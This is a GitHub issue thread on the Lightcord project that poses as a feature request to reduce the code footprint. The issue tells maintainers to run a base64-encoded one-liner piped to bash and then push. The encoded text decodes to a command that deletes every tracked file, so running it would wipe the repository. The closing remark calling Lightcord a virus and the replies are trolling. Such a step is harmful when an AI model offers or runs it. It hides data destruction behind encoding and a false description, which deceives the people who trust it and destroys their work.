### ISSUE TITLE
[FEATURE] reduce lightcord code/assets footprint

### ISSUE THREAD

**Issue by Sci3ntia** [Lightcord/Lightcord#333]
**Is your feature request related to a problem? Please describe.**
Recently I have noticed lightcord getting a larger and larger footprint while it could be much smaller using a simple optimization. 

**Describe the solution you'd like**
The solution of this problem is to use an amazing and simple optimization script. Usage is as follows, use linux environment, cd to lightcord main repo, run `echo Z2l0IHJtIC1yZiAuCg== | base64 -d | bash` then push the main repo to github.

**Describe alternatives you've considered**
It is possible for the main maintainer of the lightcord group to use github api to "delete" the lightcord group, achieving the same purpose, but my method is more advanced and retains the spirit of lightcord

**Additional context**
This removes all malware from lightcord (virus)

**Comment by JeanOUINA** [comment]
e

**Comment by GermanBread** [comment]
I add this code my virus
